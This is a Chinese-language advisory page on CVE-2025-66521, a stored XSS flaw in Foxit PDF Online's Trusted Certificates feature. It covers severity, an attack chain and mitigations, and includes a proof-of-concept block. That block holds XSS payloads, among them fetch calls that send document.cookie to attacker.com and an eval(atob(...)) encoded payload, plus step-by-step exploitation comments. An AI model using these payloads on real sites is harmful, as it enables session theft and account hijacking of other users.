CVE-2025-66521 Foxit PDF Online 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66521

漏洞类型

存储型XSS

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

pdfonline.foxit.com (Foxit PDF Online)

漏洞概述

CVE-2025-66521是Foxit PDF Online服务中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于Trusted Certificates（可信证书）功能模块中。攻击者可以通过在证书名称字段中注入恶意构造的Payload，当其他用户访问Trusted Certificates页面时，注入的恶意脚本会被浏览器解析执行，从而窃取用户会话Cookie、劫持用户账号或进行其他恶意操作。由于该XSS payload存储在服务器端，每次访问该功能页面都会触发执行，因此影响范围广泛，危害程度较高。Foxit是一家知名的PDF文档解决方案提供商，其PDF Online服务被广泛应用于企业文档处理场景，该漏洞的存在可能影响大量使用该服务的企业和个人用户。攻击者利用此漏洞可以在受害者不知情的情况下执行任意JavaScript代码，获取敏感信息或进行进一步的攻击。

技术细节

该漏洞属于存储型XSS（Stored Cross-Site Scripting），也称为持久型XSS。漏洞产生的根本原因在于应用程序在处理用户输入的证书名称时，未对输入内容进行充分的HTML转义或过滤。当用户提交包含恶意JavaScript代码的证书名称时，该代码被直接存储在数据库中。当其他用户访问Trusted Certificates功能页面时，应用程序从数据库读取证书名称并直接渲染到HTML页面中，浏览器将其解析为可执行脚本。攻击者只需构造形如<script>alert(document.cookie)</script>或<img src=x onerror=...>的Payload即可触发漏洞。由于该功能需要用户登录后操作，因此攻击者需要拥有有效的用户账号。成功利用此漏洞后，攻击者可以获取受害者的会话令牌、窃取敏感数据、修改页面内容或进行钓鱼攻击。建议受影响的用户及时关注Foxit官方安全公告，获取补丁更新信息。

攻击链分析

STEP 1

步骤1

攻击者登录pdfonline.foxit.com并访问Trusted Certificates功能页面

STEP 2

步骤2

攻击者创建新证书或在编辑现有证书时，在证书名称字段注入恶意XSS Payload

STEP 3

步骤3

应用程序将包含恶意脚本的证书名称存储到数据库，未进行输入验证或HTML转义

STEP 4

步骤4

受害者访问Trusted Certificates页面，应用程序从数据库读取证书名称并渲染到页面

STEP 5

步骤5

受害者浏览器解析HTML时执行注入的恶意JavaScript代码，导致Cookie被盗或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66521 Stored XSS PoC
// Target: pdfonline.foxit.com Trusted Certificates feature

// Method 1: Script tag payload
const xssPayload1 = '<script>alert(document.cookie)</script>';

// Method 2: Event handler payload
const xssPayload2 = '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">';

// Method 3: SVG payload
const xssPayload3 = '<svg onload="eval(atob(\'YWxlcnQoJ0NTU0onKQ==\'))">';

// Exploitation steps:
// 1. Login to pdfonline.foxit.com
// 2. Navigate to Trusted Certificates management page
// 3. Add a new certificate with the XSS payload as certificate name
// 4. Save the certificate
// 5. When any user views the Trusted Certificates list, the payload executes

// Example fetch request for cookie stealing:
// fetch('https://attacker.com/log?cookie=' + btoa(document.cookie), {mode: 'no-cors'})

影响范围

Foxit PDF Online Trusted Certificates功能（具体版本请参考官方安全公告）

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1) 限制Trusted Certificates功能的访问权限，仅允许受信任的管理员使用；2) 在Web应用防火墙（WAF）层面配置XSS防护规则，拦截包含常见XSS特征的请求；3) 提醒用户不要点击可疑链接，定期清除浏览器Cookie；4) 启用浏览器的XSS过滤器功能；5) 监控应用程序日志，关注异常的证书名称提交行为。建议尽快部署官方安全更新以彻底修复该漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66521
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66521
3 Details https://www.cvedetails.com/cve/CVE-2025-66521/
4 VulDB https://vuldb.com/cve/CVE-2025-66521
5 Link https://www.foxit.com/support/security-bulletins.html